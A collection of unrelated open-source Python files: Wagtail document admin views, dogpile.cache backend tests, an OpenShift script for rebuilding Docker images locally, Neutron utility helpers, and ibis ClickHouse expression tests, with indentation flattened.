local_path = doc.file.path
except NotImplementedError:
# Document is hosted externally (eg, S3)
local_path = None
if local_path:
# Give error if document file doesn't exist
if not os.path.isfile(local_path):
messages.error(
request,
_("The file could not be found. Please change the source or delete the document"),
buttons=[messages.button(reverse('wagtaildocs:delete', args=(doc.id,)), _('Delete'))]
)
return TemplateResponse(request, "wagtaildocs/documents/edit.html", {
'document': doc,
'filesize': doc.get_file_size(),
'form': form,
'user_can_delete': permission_policy.user_has_permission_for_instance(
request.user, 'delete', doc
),
})
@permission_checker.require('delete')
def delete(request, document_id):
Document = get_document_model()
doc = get_object_or_404(Document, id=document_id)
if not permission_policy.user_has_permission_for_instance(request.user, 'delete', doc):
raise PermissionDenied
if request.method == 'POST':
doc.delete()
messages.success(request, _("Document '{0}' deleted.").format(doc.title))
return redirect('wagtaildocs:index')
return TemplateResponse(request, "wagtaildocs/documents/confirm_delete.html", {
'document': doc,
})
def usage(request, document_id):
Document = get_document_model()
doc = get_object_or_404(Document, id=document_id)
paginator = Paginator(doc.get_usage(), per_page=20)
used_by = paginator.get_page(request.GET.get('p'))
return TemplateResponse(request, "wagtaildocs/documents/usage.html", {
'document': doc,
'used_by': used_by
})
|
|
from dogpile.cache.api import CacheBackend, CachedValue, NO_VALUE
from dogpile.cache import register_backend, CacheRegion, util
from dogpile.cache.region import _backend_loader
from . import eq_, assert_raises_message
import itertools
import time
from nose import SkipTest
from threading import Thread, Lock
from dogpile.cache.compat import thread
from unittest import TestCase
import random
import collections
class _GenericBackendFixture(object):
@classmethod
def setup_class(cls):
try:
backend_cls = _backend_loader.load(cls.backend)
backend = backend_cls(cls.config_args.get('arguments', {}))
except ImportError:
raise SkipTest("Backend %s not installed" % cls.backend)
cls._check_backend_available(backend)
def tearDown(self):
if self._region_inst:
for key in self._keys:
self._region_inst.delete(key)
self._keys.clear()
elif self._backend_inst:
self._backend_inst.delete("some_key")
@classmethod
def _check_backend_available(cls, backend):
pass
region_args = {}
config_args = {}
_region_inst = None
_backend_inst = None
_keys = set()
def _region(self, backend=None, region_args={}, config_args={}):
_region_args = self.region_args.copy()
_region_args.update(**region_args)
_config_args = self.config_args.copy()
_config_args.update(config_args)
def _store_keys(key):
if existing_key_mangler:
key = existing_key_mangler(key)
self._keys.add(key)
return key
self._region_inst = reg = CacheRegion(**_region_args)
existing_key_mangler = self._region_inst.key_mangler
self._region_inst.key_mangler = _store_keys
reg.configure(backend or self.backend, **_config_args)
return reg
def _backend(self):
backend_cls = _backend_loader.load(self.backend)
_config_args = self.config_args.copy()
self._backend_inst = backend_cls(_config_args.get('arguments', {}))
return self._backend_inst
class _GenericBackendTest(_GenericBackendFixture, TestCase):
def test_backend_get_nothing(self):
backend = self._backend()
eq_(backend.get("some_key"), NO_VALUE)
def test_backend_delete_nothing(self):
backend = self._backend()
backend.delete("some_key")
def test_backend_set_get_value(self):
backend = self._backend()
backend.set("some_key", "some value")
eq_(backend.get("some_key"), "some value")
def test_backend_delete(self):
backend = self._backend()
backend.set("some_key", "some value")
backend.delete("some_key")
eq_(backend.get("some_key"), NO_VALUE)
def test_region_set_get_value(self):
reg = self._region()
reg.set("some key", "some value")
eq_(reg.get("some key"), "some value")
def test_region_set_multiple_values(self):
reg = self._region()
values = {'key1': 'value1', 'key2': 'value2', 'key3': 'value3'}
reg.set_multi(values)
eq_(values['key1'], reg.get('key1'))
eq_(values['key2'], reg.get('key2'))
eq_(values['key3'], reg.get('key3'))
def test_region_set_zero_multiple_values(self):
reg = self._region()
reg.set_multi({})
def test_region_get_multiple_values(self):
reg = self._region()
key1 = 'value1'
key2 = 'value2'
key3 = 'value3'
reg.set('key1', key1)
reg.set('key2', key2)
reg.set('key3', key3)
values = reg.get_multi(['key1', 'key2', 'key3'])
eq_(
[key1, key2, key3], values
)
def test_region_get_nothing_multiple(self):
reg = self._region()
values = {'key1': 'value1', 'key3': 'value3', 'key5': 'value5'}
reg.set_multi(values)
reg_values = reg.get_multi(['key1', 'key2', 'key3', 'key4', 'key5', 'key6'])
eq_(
reg_values,
["value1", NO_VALUE, "value3", NO_VALUE,
"value5", NO_VALUE
]
)
def test_region_get_empty_multiple(self):
reg = self._region()
reg_values = reg.get_multi([])
eq_(reg_values, [])
def test_region_delete_multiple(self):
reg = self._region()
values = {'key1': 'value1', 'key2': 'value2', 'key3': 'value3'}
reg.set_multi(values)
reg.delete_multi(['key2', 'key10'])
eq_(values['key1'], reg.get('key1'))
eq_(NO_VALUE, reg.get('key2'))
eq_(values['key3'], reg.get('key3'))
eq_(NO_VALUE, reg.get('key10'))
def test_region_set_get_nothing(self):
reg = self._region()
eq_(reg.get("some key"), NO_VALUE)
def test_region_creator(self):
reg = self._region()
def creator():
return "some value"
eq_(reg.get_or_create("some key", creator), "some value")
def test_threaded_dogpile(self):
# run a basic dogpile concurrency test.
# note the concurrency of dogpile itself
# is intensively tested as part of dogpile.
reg = self._region(config_args={"expiration_time": .25})
lock = Lock()
canary = []
def creator():
ack = lock.acquire(False)
canary.append(ack)
time.sleep(.5)
if ack:
lock.release()
return "some value"
def f():
for x in range(5):
reg.get_or_create("some key", creator)
time.sleep(.5)
threads = [Thread(target=f) for i in range(5)]
for t in threads:
t.start()
for t in threads:
t.join()
assert len(canary) > 3
assert False not in canary
def test_threaded_get_multi(self):
reg = self._region(config_args={"expiration_time": .25})
locks = dict((str(i), Lock()) for i in range(11))
canary = collections.defaultdict(list)
def creator(*keys):
assert keys
ack = [locks[key].acquire(False) for key in keys]
#print(
# ("%s " % thread.get_ident()) + \
# ", ".join(sorted("%s=%s" % (key, acq)
# for acq, key in zip(ack, keys)))
# )
for acq, key in zip(ack, keys):
canary[key].append(acq)
time.sleep(.5)
for acq, key in zip(ack, keys):
if acq:
locks[key].release()
return ["some value %s" % k for k in keys]
def f():
for x in range(5):
reg.get_or_create_multi(
[str(random.randint(1, 10))
for i in range(random.randint(1, 5))],
creator)
time.sleep(.5)
f()
return
threads = [Thread(target=f) for i in range(5)]
for t in threads:
t.start()
for t in threads:
t.join()
assert sum([len(v) for v in canary.values()]) > 10
for l in canary.values():
assert False not in l
def test_region_delete(self):
reg = self._region()
reg.set("some key", "some value")
reg.delete("some key")
reg.delete("some key")
eq_(reg.get("some key"), NO_VALUE)
def test_region_expire(self):
reg = self._region(config_args={"expiration_time": .25})
counter = itertools.count(1)
def creator():
return "some value %d" % next(counter)
eq_(reg.get_or_create("some key", creator), "some value 1")
time.sleep(.4)
eq_(reg.get("some key", ignore_expiration=True), "some value 1")
eq_(reg.get_or_create("some key", creator), "some value 2")
eq_(reg.get("some key"), "some value 2")
def test_decorated_fn_functionality(self):
# test for any quirks in the fn decoration that interact
# with the backend.
reg = self._region()
counter = itertools.count(1)
@reg.cache_on_arguments()
def my_function(x, y):
return next(counter) + x + y
eq_(my_function(3, 4), 8)
eq_(my_function(5, 6), 13)
eq_(my_function(3, 4), 8)
eq_(my_function(4, 3), 10)
my_function.invalidate(4, 3)
eq_(my_function(4, 3), 11)
def test_exploding_value_fn(self):
reg = self._region()
def boom():
raise Exception("boom")
assert_raises_message(
Exception,
"boom",
reg.get_or_create, "some_key", boom
)
class _GenericMutexTest(_GenericBackendFixture, TestCase):
def test_mutex(self):
backend = self._backend()
mutex = backend.get_mutex("foo")
ac = mutex.acquire()
assert ac
ac2 = mutex.acquire(False)
assert not ac2
mutex.release()
ac3 = mutex.acquire()
assert ac3
mutex.release()
def test_mutex_threaded(self):
backend = self._backend()
mutex = backend.get_mutex("foo")
lock = Lock()
canary = []
def f():
for x in range(5):
mutex = backend.get_mutex("foo")
mutex.acquire()
for y in range(5):
ack = lock.acquire(False)
canary.append(ack)
time.sleep(.002)
if ack:
lock.release()
mutex.release()
time.sleep(.02)
threads = [Thread(target=f) for i in range(5)]
for t in threads:
t.start()
for t in threads:
t.join()
assert False not in canary
def test_mutex_reentrant_across_keys(self):
backend = self._backend()
for x in range(3):
m1 = backend.get_mutex("foo")
m2 = backend.get_mutex("bar")
try:
m1.acquire()
assert m2.acquire(False)
assert not m2.acquire(False)
m2.release()
assert m2.acquire(False)
assert not m2.acquire(False)
m2.release()
finally:
m1.release()
def test_reentrant_dogpile(self):
reg = self._region()
def create_foo():
return "foo" + reg.get_or_create("bar", create_bar)
def create_bar():
return "bar"
eq_(
reg.get_or_create("foo", create_foo),
"foobar"
)
eq_(
reg.get_or_create("foo", create_foo),
"foobar"
)
class MockMutex(object):
def __init__(self, key):
self.key = key
def acquire(self, blocking=True):
return True
def release(self):
return
class MockBackend(CacheBackend):
def __init__(self, arguments):
self.arguments = arguments
self._cache = {}
def get_mutex(self, key):
return MockMutex(key)
def get(self, key):
try:
return self._cache[key]
except KeyError:
return NO_VALUE
def get_multi(self, keys):
return [
self.get(key) for key in keys
]
def set(self, key, value):
self._cache[key] = value
def set_multi(self, mapping):
for key,value in mapping.items():
self.set(key, value)
def delete(self, key):
self._cache.pop(key, None)
def delete_multi(self, keys):
for key in keys:
self.delete(key)
register_backend("mock", __name__, "MockBackend")
|
|
#!/usr/bin/env python
import sys
from shutil import copy, rmtree
import distutils.dir_util as dir_util
from subprocess import call
from tempfile import mkdtemp
from atexit import register
from os import getenv, mkdir, remove
from os.path import abspath, dirname, isdir, join
if len(sys.argv) > 1 and sys.argv[1] in ['-h', '--h', '-help', '--help']:
print """Quickly re-build images depending on OpenShift Origin build artifacts.
This script re-builds OpenShift Origin images quickly. It is intended
to be used by developers for quick, iterative development of images
that depend on binaries, RPMs, or other artifacts that the Origin build
process generates. The script works by creating a temporary context
directory for a Docker build, adding a simple Dockerfile FROM the image
you wish to rebuild, ADDing in static files to overwrite, and building.
The script supports ADDing binaries from origin/_output/local/bin/linux/amd64/
and ADDing static files from the original context directories under the
origin/images/ directories.
Usage:
[OS_DEBUG=true] [OS_IMAGE_PREFIX=prefix] build-local-images.py [IMAGE...]
Specific images can be specified to be built with either the full name
of the image (e.g. openshift3/ose-haproxy-router) or the name sans prefix
(e.g. haproxy-router).
The following environment veriables are honored by this script:
- $OS_IMAGE_PREFIX: one of [openshift/origin, openshift3/ose]
- $OS_DEBUG: if set, debugging information will be printed
Examples:
# build all images
build-local-images.py
# build only the f5-router image
build-local-images.py f5-router
# build with a different image prefix
OS_IMAGE_PREFIX=openshift3/ose build-local-images.sh
Options:
-h,--h, -help,--help: show this help-text
"""
exit(2)
os_image_prefix = getenv("OS_IMAGE_PREFIX", "openshift/origin")
image_namespace, image_prefix = os_image_prefix.split("/", 2)
image_config = {
image_prefix: {
"directory": "origin",
"binaries": {
"openshift": "/usr/bin/openshift"
},
"files": {}
},
"deployer": {
"directory": "deployer",
"binaries": {
"openshift": "/usr/bin/openshift"
},
"files": {}
},
"recycler": {
"directory": "recycler",
"binaries": {
"openshift": "/usr/bin/openshift"
},
"files": {}
},
"docker-builder": {
"directory": "builder/docker/docker-builder",
"binaries": {
"openshift": "/usr/bin/openshift"
},
"files": {}
},
"sti-builder": {
"directory": "builder/docker/sti-builder",
"binaries": {
"openshift": "/usr/bin/openshift"
},
"files": {}
},
"f5-router": {
"directory": "router/f5",
"binaries": {
"openshift": "/usr/bin/openshift"
},
"files": {}
},
"nginx-router": {
"directory": "router/nginx",
"binaries": {
"openshift": "/usr/bin/openshift"
},
"files": {
".": "/var/lib/nginx"
}
},
"haproxy-router": {
"directory": "router/haproxy",
"binaries": {
"openshift": "/usr/bin/openshift"
},
"files": {
".": "/var/lib/haproxy"
}
},
"keepalived-ipfailover": {
"directory": "ipfailover/keepalived",
"binaries": {
"openshift": "/usr/bin/openshift"
},
"files": {
".": "/var/lib/ipfailover/keepalived"
}
},
"node": {
"directory": "node",
"binaries": {
"openshift": "/usr/bin/openshift"
},
"files": {}
},
"openvswitch": {
"directory": "openvswitch",
"binaries": {
"openshift": "/usr/bin/openshift"
},
"files": {}
},
"service-catalog": {
"directory": "service-catalog",
"vendor_dir": "cmd/service-catalog/go/src/github.com/kubernetes-incubator/service-catalog",
"binaries": {
"service-catalog": "/usr/bin/service-catalog",
},
"files": {},
"enable_default": False,
},
}
def image_rebuild_requested(image):
"""
An image rebuild is requested if the
user provides the image name or image
suffix explicitly or does not provide
any explicit requests.
"""
implicitly_triggered = len(sys.argv) == 1 and image_config[image].get("enable_default", True)
explicitly_triggered = len(sys.argv) > 1 and (image in sys.argv or full_name(image) in sys.argv)
return implicitly_triggered or explicitly_triggered
def full_name(image):
"""
The full name of the image will contain
the image namespace as well as the pre-
fix, if applicable.
"""
if image in ["node", "openvswitch", image_prefix]:
return "{}/{}".format(image_namespace, image)
return "{}/{}-{}".format(image_namespace, image_prefix, image)
def add_to_context(context_dir, source, destination, container_destination):
"""
Add a file to the context directory
and add an entry to the Dockerfile
to place it in the container file-
sytem at the correct destination.
"""
debug("Adding file:\n\tfrom {}\n\tto {}\n\tincluding in container at {}".format(
source,
join(context_dir, destination),
container_destination)
)
absolute_destination = abspath(join(context_dir, destination))
if isdir(source):
dir_util.copy_tree(source, absolute_destination)
else:
copy(source, absolute_destination)
with open(join(context_dir, "Dockerfile"), "a") as dockerfile:
dockerfile.write("ADD {} {}\n".format(destination, container_destination))
def debug(message):
if getenv("OS_DEBUG"):
print "[DEBUG] {}".format(message)
os_root = abspath(join(dirname(__file__), ".."))
os_image_path = join(os_root, "images")
context_dir = mkdtemp()
register(rmtree, context_dir)
debug("Created temporary context dir at {}".format(context_dir))
mkdir(join(context_dir, "bin"))
mkdir(join(context_dir, "src"))
build_occurred = False
for image in image_config:
if not image_rebuild_requested(image):
continue
build_occurred = True
print "[INFO] Building {}...".format(image)
with open(join(context_dir, "Dockerfile"), "w+") as dockerfile:
dockerfile.write("FROM {}\n".format(full_name(image)))
binary_dir_args = ["_output", "local", "bin", "linux", "amd64"]
config = image_config[image]
for binary in config.get("binaries", []):
if "vendor_dir" in config:
os_bin_path = join(os_root, config.get("vendor_dir"), *binary_dir_args)
else:
os_bin_path = join(os_root, *binary_dir_args)
add_to_context(
context_dir,
source=join(os_bin_path, binary),
destination=join("bin", binary),
container_destination=config["binaries"][binary]
)
mkdir(join(context_dir, "src", image))
for file in config.get("files", []):
add_to_context(
context_dir,
source=join(os_image_path, config["directory"], file),
destination=join("src", image, file),
container_destination=config["files"][file]
)
debug("Initiating Docker build with Dockerfile:\n{}".format(open(join(context_dir, "Dockerfile")).read()))
call(["docker", "build", "-t", full_name(image), "."], cwd=context_dir)
remove(join(context_dir, "Dockerfile"))
rmtree(join(context_dir, "src", image))
if not build_occurred and len(sys.argv) > 1:
print "[ERROR] The provided image names ({}) did not match any buildable images.".format(
", ".join(sys.argv[1:])
)
print "[ERROR] This script knows how to build:\n\t{}".format(
"\n\t".join(map(full_name, image_config.keys()))
)
exit(1)
|
|
# Copyright 2011, VMware, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# Borrowed from nova code base, more utilities will be added/borrowed as and
# when needed.
"""Utilities and helper functions."""
import collections
import datetime
import decimal
import errno
import functools
import hashlib
import multiprocessing
import netaddr
import os
import random
import signal
import socket
import sys
import tempfile
import uuid
import debtcollector
from eventlet.green import subprocess
from oslo_concurrency import lockutils
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import excutils
from oslo_utils import importutils
import six
from stevedore import driver
from neutron.common import constants as n_const
from neutron.i18n import _LE
TIME_FORMAT = "%Y-%m-%dT%H:%M:%SZ"
LOG = logging.getLogger(__name__)
SYNCHRONIZED_PREFIX = 'neutron-'
synchronized = lockutils.synchronized_with_prefix(SYNCHRONIZED_PREFIX)
class cache_method_results(object):
"""This decorator is intended for object methods only."""
def __init__(self, func):
self.func = func
functools.update_wrapper(self, func)
self._first_call = True
self._not_cached = object()
def _get_from_cache(self, target_self, *args, **kwargs):
func_name = "%(module)s.%(class)s.%(func_name)s" % {
'module': target_self.__module__,
'class': target_self.__class__.__name__,
'func_name': self.func.__name__,
}
key = (func_name,) + args
if kwargs:
key += dict2tuple(kwargs)
try:
item = target_self._cache.get(key, self._not_cached)
except TypeError:
LOG.debug("Method %(func_name)s cannot be cached due to "
"unhashable parameters: args: %(args)s, kwargs: "
"%(kwargs)s",
{'func_name': func_name,
'args': args,
'kwargs': kwargs})
return self.func(target_self, *args, **kwargs)
if item is self._not_cached:
item = self.func(target_self, *args, **kwargs)
target_self._cache.set(key, item, None)
return item
def __call__(self, target_self, *args, **kwargs):
if not hasattr(target_self, '_cache'):
raise NotImplementedError(
"Instance of class %(module)s.%(class)s must contain _cache "
"attribute" % {
'module': target_self.__module__,
'class': target_self.__class__.__name__})
if not target_self._cache:
if self._first_call:
LOG.debug("Instance of class %(module)s.%(class)s doesn't "
"contain attribute _cache therefore results "
"cannot be cached for %(func_name)s.",
{'module': target_self.__module__,
'class': target_self.__class__.__name__,
'func_name': self.func.__name__})
self._first_call = False
return self.func(target_self, *args, **kwargs)
return self._get_from_cache(target_self, *args, **kwargs)
def __get__(self, obj, objtype):
return functools.partial(self.__call__, obj)
@debtcollector.removals.remove(message="This will removed in the N cycle.")
def read_cached_file(filename, cache_info, reload_func=None):
"""Read from a file if it has been modified.
:param cache_info: dictionary to hold opaque cache.
:param reload_func: optional function to be called with data when
file is reloaded due to a modification.
:returns: data from file
"""
mtime = os.path.getmtime(filename)
if not cache_info or mtime != cache_info.get('mtime'):
LOG.debug("Reloading cached file %s", filename)
with open(filename) as fap:
cache_info['data'] = fap.read()
cache_info['mtime'] = mtime
if reload_func:
reload_func(cache_info['data'])
return cache_info['data']
@debtcollector.removals.remove(message="This will removed in the N cycle.")
def find_config_file(options, config_file):
"""Return the first config file found.
We search for the paste config file in the following order:
* If --config-file option is used, use that
* Search for the configuration files via common cfg directories
:retval Full path to config file, or None if no config file found
"""
fix_path = lambda p: os.path.abspath(os.path.expanduser(p))
if options.get('config_file'):
if os.path.exists(options['config_file']):
return fix_path(options['config_file'])
dir_to_common = os.path.dirname(os.path.abspath(__file__))
root = os.path.join(dir_to_common, '..', '..', '..', '..')
# Handle standard directory search for the config file
config_file_dirs = [fix_path(os.path.join(os.getcwd(), 'etc')),
fix_path(os.path.join('~', '.neutron-venv', 'etc',
'neutron')),
fix_path('~'),
os.path.join(cfg.CONF.state_path, 'etc'),
os.path.join(cfg.CONF.state_path, 'etc', 'neutron'),
fix_path(os.path.join('~', '.local',
'etc', 'neutron')),
'/usr/etc/neutron',
'/usr/local/etc/neutron',
'/etc/neutron/',
'/etc']
if 'plugin' in options:
config_file_dirs = [
os.path.join(x, 'neutron', 'plugins', options['plugin'])
for x in config_file_dirs
]
if os.path.exists(os.path.join(root, 'plugins')):
plugins = [fix_path(os.path.join(root, 'plugins', p, 'etc'))
for p in os.listdir(os.path.join(root, 'plugins'))]
plugins = [p for p in plugins if os.path.isdir(p)]
config_file_dirs.extend(plugins)
for cfg_dir in config_file_dirs:
cfg_file = os.path.join(cfg_dir, config_file)
if os.path.exists(cfg_file):
return cfg_file
def ensure_dir(dir_path):
"""Ensure a directory with 755 permissions mode."""
try:
os.makedirs(dir_path, 0o755)
except OSError as e:
# If the directory already existed, don't raise the error.
if e.errno != errno.EEXIST:
raise
def _subprocess_setup():
# Python installs a SIGPIPE handler by default. This is usually not what
# non-Python subprocesses expect.
signal.signal(signal.SIGPIPE, signal.SIG_DFL)
def subprocess_popen(args, stdin=None, stdout=None, stderr=None, shell=False,
env=None, preexec_fn=_subprocess_setup, close_fds=True):
return subprocess.Popen(args, shell=shell, stdin=stdin, stdout=stdout,
stderr=stderr, preexec_fn=preexec_fn,
close_fds=close_fds, env=env)
def parse_mappings(mapping_list, unique_values=True):
"""Parse a list of mapping strings into a dictionary.
:param mapping_list: a list of strings of the form '<key>:<value>'
:param unique_values: values must be unique if True
:returns: a dict mapping keys to values
"""
mappings = {}
for mapping in mapping_list:
mapping = mapping.strip()
if not mapping:
continue
split_result = mapping.split(':')
if len(split_result) != 2:
raise ValueError(_("Invalid mapping: '%s'") % mapping)
key = split_result[0].strip()
if not key:
raise ValueError(_("Missing key in mapping: '%s'") % mapping)
value = split_result[1].strip()
if not value:
raise ValueError(_("Missing value in mapping: '%s'") % mapping)
if key in mappings:
raise ValueError(_("Key %(key)s in mapping: '%(mapping)s' not "
"unique") % {'key': key, 'mapping': mapping})
if unique_values and value in mappings.values():
raise ValueError(_("Value %(value)s in mapping: '%(mapping)s' "
"not unique") % {'value': value,
'mapping': mapping})
mappings[key] = value
return mappings
def get_hostname():
return socket.gethostname()
def get_first_host_ip(net, ip_version):
return str(netaddr.IPAddress(net.first + 1, ip_version))
def compare_elements(a, b):
"""Compare elements if a and b have same elements.
This method doesn't consider ordering
"""
if a is None:
a = []
if b is None:
b = []
return set(a) == set(b)
def safe_sort_key(value):
"""Return value hash or build one for dictionaries."""
if isinstance(value, collections.Mapping):
return sorted(value.items())
return value
def dict2str(dic):
return ','.join("%s=%s" % (key, val)
for key, val in sorted(six.iteritems(dic)))
def str2dict(string):
res_dict = {}
for keyvalue in string.split(','):
(key, value) = keyvalue.split('=', 1)
res_dict[key] = value
return res_dict
def dict2tuple(d):
items = list(d.items())
items.sort()
return tuple(items)
def diff_list_of_dict(old_list, new_list):
new_set = set([dict2str(l) for l in new_list])
old_set = set([dict2str(l) for l in old_list])
added = new_set - old_set
removed = old_set - new_set
return [str2dict(a) for a in added], [str2dict(r) for r in removed]
def is_extension_supported(plugin, ext_alias):
return ext_alias in getattr(
plugin, "supported_extension_aliases", [])
def log_opt_values(log):
cfg.CONF.log_opt_values(log, logging.DEBUG)
def get_random_mac(base_mac):
mac = [int(base_mac[0], 16), int(base_mac[1], 16),
int(base_mac[2], 16), random.randint(0x00, 0xff),
random.randint(0x00, 0xff), random.randint(0x00, 0xff)]
if base_mac[3] != '00':
mac[3] = int(base_mac[3], 16)
return ':'.join(["%02x" % x for x in mac])
def get_random_string(length):
"""Get a random hex string of the specified length.
based on Cinder library
cinder/transfer/api.py
"""
rndstr = ""
random.seed(datetime.datetime.now().microsecond)
while len(rndstr) < length:
base_str = str(random.random()).encode('utf-8')
rndstr += hashlib.sha224(base_str).hexdigest()
return rndstr[0:length]
def get_dhcp_agent_device_id(network_id, host):
# Split host so as to always use only the hostname and
# not the domain name. This will guarantee consistency
# whether a local hostname or an fqdn is passed in.
local_hostname = host.split('.')[0]
host_uuid = uuid.uuid5(uuid.NAMESPACE_DNS, str(local_hostname))
return 'dhcp%s-%s' % (host_uuid, network_id)
def cpu_count():
try:
return multiprocessing.cpu_count()
except NotImplementedError:
return 1
class exception_logger(object):
"""Wrap a function and log raised exception
:param logger: the logger to log the exception default is LOG.exception
:returns: origin value if no exception raised; re-raise the exception if
any occurred
"""
def __init__(self, logger=None):
self.logger = logger
def __call__(self, func):
if self.logger is None:
LOG = logging.getLogger(func.__module__)
self.logger = LOG.exception
def call(*args, **kwargs):
try:
return func(*args, **kwargs)
except Exception as e:
with excutils.save_and_reraise_exception():
self.logger(e)
return call
def is_dvr_serviced(device_owner):
"""Check if the port need to be serviced by DVR
Helper function to check the device owners of the
ports in the compute and service node to make sure
if they are required for DVR or any service directly or
indirectly associated with DVR.
"""
dvr_serviced_device_owners = (n_const.DEVICE_OWNER_LOADBALANCER,
n_const.DEVICE_OWNER_LOADBALANCERV2,
n_const.DEVICE_OWNER_DHCP)
return (device_owner.startswith(n_const.DEVICE_OWNER_COMPUTE_PREFIX) or
device_owner in dvr_serviced_device_owners)
@debtcollector.removals.remove(message="This will removed in the N cycle.")
def get_keystone_url(conf):
if conf.auth_uri:
auth_uri = conf.auth_uri.rstrip('/')
else:
auth_uri = ('%(protocol)s://%(host)s:%(port)s' %
{'protocol': conf.auth_protocol,
'host': conf.auth_host,
'port': conf.auth_port})
# NOTE(ihrachys): all existing consumers assume version 2.0
return '%s/v2.0/' % auth_uri
def ip_to_cidr(ip, prefix=None):
"""Convert an ip with no prefix to cidr notation
:param ip: An ipv4 or ipv6 address. Convertable to netaddr.IPNetwork.
:param prefix: Optional prefix. If None, the default 32 will be used for
ipv4 and 128 for ipv6.
"""
net = netaddr.IPNetwork(ip)
if prefix is not None:
# Can't pass ip and prefix separately. Must concatenate strings.
net = netaddr.IPNetwork(str(net.ip) + '/' + str(prefix))
return str(net)
def fixed_ip_cidrs(fixed_ips):
"""Create a list of a port's fixed IPs in cidr notation.
:param fixed_ips: A neutron port's fixed_ips dictionary
"""
return [ip_to_cidr(fixed_ip['ip_address'], fixed_ip.get('prefixlen'))
for fixed_ip in fixed_ips]
def is_cidr_host(cidr):
"""Determines if the cidr passed in represents a single host network
:param cidr: Either an ipv4 or ipv6 cidr.
:returns: True if the cidr is /32 for ipv4 or /128 for ipv6.
:raises ValueError: raises if cidr does not contain a '/'. This disallows
plain IP addresses specifically to avoid ambiguity.
"""
if '/' not in str(cidr):
raise ValueError("cidr doesn't contain a '/'")
net = netaddr.IPNetwork(cidr)
if net.version == 4:
return net.prefixlen == n_const.IPv4_BITS
return net.prefixlen == n_const.IPv6_BITS
def ip_version_from_int(ip_version_int):
if ip_version_int == 4:
return n_const.IPv4
if ip_version_int == 6:
return n_const.IPv6
raise ValueError(_('Illegal IP version number'))
def is_port_trusted(port):
"""Used to determine if port can be trusted not to attack network.
Trust is currently based on the device_owner field starting with 'network:'
since we restrict who can use that in the default policy.json file.
"""
return port['device_owner'].startswith('network:')
class DelayedStringRenderer(object):
"""Takes a callable and its args and calls when __str__ is called
Useful for when an argument to a logging statement is expensive to
create. This will prevent the callable from being called if it's
never converted to a string.
"""
def __init__(self, function, *args, **kwargs):
self.function = function
self.args = args
self.kwargs = kwargs
def __str__(self):
return str(self.function(*self.args, **self.kwargs))
def camelize(s):
return ''.join(s.replace('_', ' ').title().split())
def round_val(val):
# we rely on decimal module since it behaves consistently across Python
# versions (2.x vs. 3.x)
return int(decimal.Decimal(val).quantize(decimal.Decimal('1'),
rounding=decimal.ROUND_HALF_UP))
def replace_file(file_name, data, file_mode=0o644):
"""Replaces the contents of file_name with data in a safe manner.
First write to a temp file and then rename. Since POSIX renames are
atomic, the file is unlikely to be corrupted by competing writes.
We create the tempfile on the same device to ensure that it can be renamed.
"""
base_dir = os.path.dirname(os.path.abspath(file_name))
with tempfile.NamedTemporaryFile('w+',
dir=base_dir,
delete=False) as tmp_file:
tmp_file.write(data)
os.chmod(tmp_file.name, file_mode)
os.rename(tmp_file.name, file_name)
def load_class_by_alias_or_classname(namespace, name):
"""Load class using stevedore alias or the class name
:param namespace: namespace where the alias is defined
:param name: alias or class name of the class to be loaded
:returns class if calls can be loaded
:raises ImportError if class cannot be loaded
"""
if not name:
LOG.error(_LE("Alias or class name is not set"))
raise ImportError(_("Class not found."))
try:
# Try to resolve class by alias
mgr = driver.DriverManager(namespace, name)
class_to_load = mgr.driver
except RuntimeError:
e1_info = sys.exc_info()
# Fallback to class name
try:
class_to_load = importutils.import_class(name)
except (ImportError, ValueError):
LOG.error(_LE("Error loading class by alias"),
exc_info=e1_info)
LOG.error(_LE("Error loading class by class name"),
exc_info=True)
raise ImportError(_("Class not found."))
return class_to_load
|
|
import operator
from datetime import date, datetime
import numpy as np
import pandas as pd
import pandas.testing as tm
import pytest
import ibis
import ibis.expr.datatypes as dt
from ibis import literal as L
pytest.importorskip("clickhouse_driver")
@pytest.mark.parametrize(
('left', 'right', 'type'),
[
(L('2017-04-01'), date(2017, 4, 2), dt.date),
(date(2017, 4, 2), L('2017-04-01'), dt.date),
(
L('2017-04-01 01:02:33'),
datetime(2017, 4, 1, 1, 3, 34),
dt.timestamp,
),
(
datetime(2017, 4, 1, 1, 3, 34),
L('2017-04-01 01:02:33'),
dt.timestamp,
),
],
)
@pytest.mark.parametrize(
'op',
[
operator.eq,
operator.ne,
operator.lt,
operator.le,
operator.gt,
operator.ge,
],
)
def test_string_temporal_compare(con, op, left, right, type):
expr = op(left, right)
result = con.execute(expr)
left_raw = con.execute(L(left).cast(type))
right_raw = con.execute(L(right).cast(type))
expected = op(left_raw, right_raw)
assert result == expected
@pytest.mark.parametrize(
('func', 'left', 'right', 'expected'),
[
(operator.add, L(3), L(4), 7),
(operator.sub, L(3), L(4), -1),
(operator.mul, L(3), L(4), 12),
(operator.truediv, L(12), L(4), 3),
(operator.pow, L(12), L(2), 144),
(operator.mod, L(12), L(5), 2),
(operator.truediv, L(7), L(2), 3.5),
(operator.floordiv, L(7), L(2), 3),
(lambda x, y: x.floordiv(y), L(7), 2, 3),
(lambda x, y: x.rfloordiv(y), L(2), 7, 3),
],
)
def test_binary_arithmetic(con, func, left, right, expected):
expr = func(left, right)
result = con.execute(expr)
assert result == expected
@pytest.mark.parametrize(
('op', 'expected'),
[
(lambda a, b: a + b, '`int_col` + `tinyint_col`'),
(lambda a, b: a - b, '`int_col` - `tinyint_col`'),
(lambda a, b: a * b, '`int_col` * `tinyint_col`'),
(lambda a, b: a / b, '`int_col` / `tinyint_col`'),
(lambda a, b: a**b, 'pow(`int_col`, `tinyint_col`)'),
(lambda a, b: a < b, '`int_col` < `tinyint_col`'),
(lambda a, b: a <= b, '`int_col` <= `tinyint_col`'),
(lambda a, b: a > b, '`int_col` > `tinyint_col`'),
(lambda a, b: a >= b, '`int_col` >= `tinyint_col`'),
(lambda a, b: a == b, '`int_col` = `tinyint_col`'),
(lambda a, b: a != b, '`int_col` != `tinyint_col`'),
],
)
def test_binary_infix_operators(con, alltypes, translate, op, expected):
a, b = alltypes.int_col, alltypes.tinyint_col
expr = op(a, b)
assert translate(expr) == expected
assert len(con.execute(expr))
